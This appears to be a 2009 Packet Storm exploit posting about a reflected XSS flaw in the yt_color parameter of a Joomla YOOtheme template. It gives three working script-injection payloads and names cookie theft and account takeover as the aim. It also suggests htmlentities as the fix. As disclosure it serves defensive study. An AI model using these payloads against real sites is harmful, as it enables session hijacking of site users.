Joomla YOOOtheme Cross Site Scripting

2009-12-07T00:00:00
ID PACKETSTORM:83526
Type packetstorm
Reporter andresg888
Modified 2009-12-07T00:00:00

Description

                                        
                                            `  
view source  
print?  
##########################[andresg888]##########################  
# Exploit Title : Joomla yt_color YOOOtheme [xss, cookie stealing]  
# Date : 2009-12-04  
# Author : andresg888  
# Software Link : http://www.yootheme.com/  
# Contact : andresg888[4t]gmail[dot]com  
# Web: : www.ilegalintrusion.net & www.bl4ck-p0rtal.org  
# Dork : No DoRk f0R ScRipT KiDDieS  
########################################################################  
# The GET variable yt_color can be set to any script  
########################################################################  
# Example 1: index.php/inicio?yt_color=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E  
# Example 2: index.php?option=com_content&task=view&id=13&Itemid=47&yt_color=%00'%22%3E%3CScRiPt%20%0a%0d%3Ealert(123456)%3B%3C/ScRiPt%3E  
# Example 3: The GET variable yt_color can be set to "+onmouseover=alert(123456)+  
########################################################################  
# Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable  
# application to fool a user in order to gather data from them. An attacker can steal the  
# session cookie and take over the account.  
########################################################################  
# Solution:  
# Use htmlentities() or htmlspecialchars() functions.  
# Solution Example : $name=htmlentities($_GET['name'])  
########################################################################  
# Greetz : _84kur10_ , Brunos_50, mmrg5486, LU73K, Joshu4X, 3l_d105_4r35  
# Special Thanks : all members from ilegalintrusion & black-portal  
##########################[andresg888]#################################  
  
`